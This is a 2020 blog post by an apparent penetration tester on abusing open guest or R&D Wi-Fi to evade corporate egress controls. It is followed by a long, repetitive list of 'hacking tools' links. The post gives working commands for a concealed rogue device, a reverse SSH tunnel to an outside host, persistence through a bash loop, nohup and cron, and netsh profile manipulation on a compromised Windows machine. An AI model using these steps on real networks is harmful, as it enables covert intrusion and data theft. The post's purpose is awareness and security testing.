Thursday, August 27, 2020

Backchannel Data Exfiltration Via Guest/R&D Wi-Fi


Often times I find unprotected wireless access points with unfettered access to the internet for research or guest access purposes. This is generally through an unauthenticated portal or a direct cable connection. When questioning the business units they explain a low value network, which is simply a internet pass thru separate from the internal network. This sounds reasonable and almost plausible however I usually explain the dangers of having company assets on an unprotected Wi-Fi and the dangers of client side exploits and MITM attacks. But there are a few other plausible scenarios one should be aware of that may scare you a bit more then the former discussion.

What about using OpenWifi as a backchannel data exfiltration medium?

An open Wi-Fi is a perfect data exfiltration medium for attackers to completely bypass egress filtering issues, DLP, proxy filtering issues and a whole bunch of other protection mechanisms in place to keep attackers from sending out shells and moving data between networks. This can easily be accomplished via dual homing your attack host utilizing multiple nic cards which are standard on almost all modern machines. Whether this is from physical access breach or via remote compromise the results can be deadly. Below are a few scenarios, which can lead to undetectable data exfiltration.




Scenario 1: (PwnPlug/Linux host with Wi-Fi adaptor)
The first useful scenario is when a physical perimeter has been breached and a small device from http://pwnieexpress.com/ known as a pwn-plug is installed into the target network or a linux host with a wireless card. I usually install pwn-plug's inside a closet or under a desk somewhere which is not visible and allows a network connection out to an attacker owned host. Typically its a good idea to label the small device as "IT property and Do Not Remove". This will keep a casual user from removing the device. However if there is network egress and proxy filtering present then our network connection may never reach a remote host. At this point your physical breach to gain network access to an impenetrable network perimeter will fail. Unless there happens to be an open cable Wi-Fi connection to an "inconsequential R&D network".

By simply attaching an Alpha card to the pwnplug you can connect to the R&D wireless network. You can then use this network as your outgoing connection and avoid corporate restrictions regarding outbound connections via metasploit or ssh. I have noticed that most clients these days are running heavy egress filtering and packet level protocol detection, which stops outbound connections. Rather then play the obfuscation game i prefer to bypass the restrictions all together using networks which have escaped corporate policy.

You can automate the following via a script if you wardrive the facility prior to entrance and gain insight into the open wireless network, or you can also configure the plug via serial connection on site provided you have time.

Connect to wifi:
ifconfig wlan0 up
iwconfig wlan0 essid [targetNetworkSSID]
dhclient wlan0

Run a reverse SSH tunnel:
ssh -R 3000:127.0.0.1:22 root@remoteHost.com

On the remote host you can retrieve your shell:
ssh -p 3000 User@localhost

Once you have authenticated with the pwnplug via your local host port forward you now have access into the internal network via an encrypted tunnel which will not be detected and fully bypass any corporate security restrictions. You can take this a bit further and setup some persistence in case the shell goes down.. This can be done via bash and nohup if you setup some ssh keys to handle authentication.. One example could be the following script:

Your bash script: 
#---------------------
#!/bin/bash
while true
do
 ssh -R 3000:127.0.0.1:22 root@remoteHost.com
 sleep 10
done
#---------------------

Run this with nohup like this:
nohup ./shell.sh &


Another simple way would be to setup a cron job to run a script with your ssh command on a specified interval for example every 5 minutes like so:

Cron job for every 5 minutes: 
*/5 * * * * /shell.sh



Scenario 2: (Remote Windows Compromise)
The second scenario is that of a compromised modern windows machine with a wireless card, this can be used to make a wireless connection outbound similar to the first scenario which will bypass restrictions by accessing an unrestricted network. As shown in "Vista Power Tools" paper written by Josh Wright you can use modern windows machines cards via the command line.
http://www.inguardians.com/pubs/Vista_Wireless_Power_Tools-Wright.pdf

Below are the commands to profile the networks and export a current profile then import a new profile for your target wireless network. Then from there you can connect and use that network to bypass corp restrictions provided that wireless network doesn't have its own restrictions.

Profile Victim machine and extract a wireless profile: 
netsh wlan show interfaces
netsh wlan show networks mode=bssid
netsh wlan show profiles
netsh wlan export profile name="CorpNetwork"

Then modify that profile to meet the requirements needed for the R&D network and import it into the victim machine.

Upload a new profile and connect to the network: 
netsh wlan add profile filename="R&D.xml"
netsh wlan show profiles
netsh wlan connect name="R&D"

If you check out Josh's excellent paper linked above you will also find ways of bridging between ethernet and wireless adaptors along with lots of other ideas and useful information.

I just got thinking the other day of ways to abuse so called guest or R&D networks and started writing down a few ideas based on scenarios which play out time and time again while penetration testing networks and running physical breach attacks. I hear all to often that a cable connection not linked to the corporate network is totally safe and I call bullshit on that.

Related posts

  1. Hacker Security Tools
  2. Pentest Tools Nmap
  3. Blackhat Hacker Tools
  4. Hacker Techniques Tools And Incident Handling
  5. Hacking Tools Name
  6. Growth Hacker Tools
  7. Hacking Tools For Windows 7
  8. Nsa Hack Tools Download
  9. Hacking Tools Hardware
  10. Github Hacking Tools
  11. How To Hack
  12. Hacker Techniques Tools And Incident Handling
  13. Nsa Hack Tools Download
  14. Pentest Tools Linux
  15. Hacker Tools Free
  16. Hacking Tools
  17. Hacking Tools For Games
  18. Hacker Tools Windows
  19. Black Hat Hacker Tools
  20. Hacking Tools Windows 10
  21. Hacking Tools Online
  22. Pentest Tools Website
  23. Computer Hacker
  24. Bluetooth Hacking Tools Kali
  25. Hacking Tools
  26. Pentest Tools Website
  27. Pentest Tools Download
  28. Ethical Hacker Tools
  29. Hack Tools Download
  30. Hacker Tools Linux
  31. Hack Website Online Tool
  32. Easy Hack Tools
  33. Hacking Tools Mac
  34. Hacker Security Tools
  35. Hacker Security Tools
  36. Hacking Tools And Software
  37. Easy Hack Tools
  38. Hacking Tools And Software
  39. Pentest Tools Nmap
  40. Hacker Tools Hardware
  41. Tools 4 Hack
  42. Hacking Tools 2019
  43. Hacking Tools For Windows Free Download
  44. Hacker
  45. Easy Hack Tools
  46. Hacking App
  47. Hack Tools Mac
  48. Hacking Tools Windows 10
  49. Top Pentest Tools
  50. Hacking Tools Github
  51. Hacking Tools And Software
  52. Hacker Tools Online
  53. Pentest Tools Windows
  54. Hacking Tools Download
  55. Pentest Tools Review
  56. Hack Tools Download
  57. Black Hat Hacker Tools
  58. Nsa Hack Tools Download
  59. Free Pentest Tools For Windows
  60. Install Pentest Tools Ubuntu
  61. Hacker Hardware Tools
  62. Hacking Tools For Kali Linux
  63. Kik Hack Tools
  64. Game Hacking
  65. Top Pentest Tools
  66. Hacking Tools 2019
  67. Hacker Tools List
  68. Hack App
  69. Pentest Tools Alternative
  70. Hacker Tools List
  71. Termux Hacking Tools 2019
  72. Hacking Tools For Games
  73. Hack Website Online Tool
  74. Kik Hack Tools
  75. Game Hacking
  76. Hacking Tools Hardware
  77. Hacking Tools For Windows Free Download
  78. Hacker Tools Hardware
  79. Hacking Tools For Pc
  80. Hacker Tools For Mac
  81. What Is Hacking Tools
  82. Hack Tool Apk
  83. Pentest Tools For Windows
  84. Hacking Tools Windows 10
  85. Hacker Tools Software
  86. Hackrf Tools
  87. Hacking Tools Name
  88. Hacking Tools Download
  89. Hacker Tools 2019
  90. Hacker Tools Apk Download
  91. Hacking Tools Pc
  92. Best Hacking Tools 2019
  93. Hacker Tools For Mac
  94. Hacking Tools Usb
  95. Hacker Tool Kit
  96. Hacking Tools Usb
  97. Hacker Tools Hardware
  98. How To Make Hacking Tools
  99. Pentest Tools Port Scanner
  100. Hacker Tools Software
  101. Best Hacking Tools 2020
  102. Pentest Tools Linux
  103. Hacking Tools Windows 10
  104. Bluetooth Hacking Tools Kali
  105. Hacker Tools For Pc
  106. Hacker Tools Hardware
  107. Tools 4 Hack
  108. Tools 4 Hack
  109. Tools 4 Hack
  110. Hack Tools For Games
  111. Hacker Tools Free Download
  112. What Are Hacking Tools
  113. Pentest Tools Apk
  114. Hack Tools For Pc
  115. Hacking Tools For Games
  116. Hacking Tools Usb
  117. Hacking Tools
  118. Hacker Search Tools
  119. Hacker Tools Windows
  120. Hacker Tools 2019
  121. Pentest Tools Android
  122. Tools Used For Hacking
  123. How To Install Pentest Tools In Ubuntu
  124. Hack And Tools
  125. Pentest Tools Kali Linux
  126. Hacker Search Tools
  127. Pentest Tools Bluekeep
  128. Hack Rom Tools
  129. Pentest Automation Tools
  130. Hacking Tools For Mac
  131. Pentest Tools Kali Linux
  132. Tools Used For Hacking
  133. Hacking App
  134. Pentest Tools Website Vulnerability
  135. Hacking Tools Hardware
  136. Pentest Tools For Windows
  137. Pentest Tools Url Fuzzer
  138. Hacking Apps
  139. Free Pentest Tools For Windows
  140. Hacking Tools
  141. Pentest Tools For Windows
  142. Pentest Tools Url Fuzzer
  143. Hacking Tools For Games
  144. Hacking Tools Kit
  145. Pentest Tools Url Fuzzer
  146. Hacker Hardware Tools
  147. Pentest Tools Free
  148. Hacking Tools For Windows 7
  149. Hacking Tools 2020
  150. Hacking Tools Usb
  151. Hack Tools For Games
  152. Best Hacking Tools 2020
  153. Hacking Tools Windows 10
  154. Hacker Tools 2020
  155. Hacker Tools Hardware
  156. Hacking Tools Free Download
  157. Pentest Tools Android
  158. World No 1 Hacker Software
  159. Hak5 Tools
  160. Nsa Hack Tools
  161. Hacker Tools Linux
  162. Hacking Tools Usb
  163. Hack Tool Apk No Root
  164. Github Hacking Tools
  165. Hackers Toolbox
  166. Hack Tools Github
  167. Hacker Tools Free Download
  168. Hacking Tools For Pc
  169. Hack Tool Apk
  170. Hack Tools 2019
  171. Kik Hack Tools
  172. Pentest Tools Bluekeep
  173. Computer Hacker
  174. Pentest Tools List
  175. Wifi Hacker Tools For Windows
  176. Pentest Tools

No comments:

Post a Comment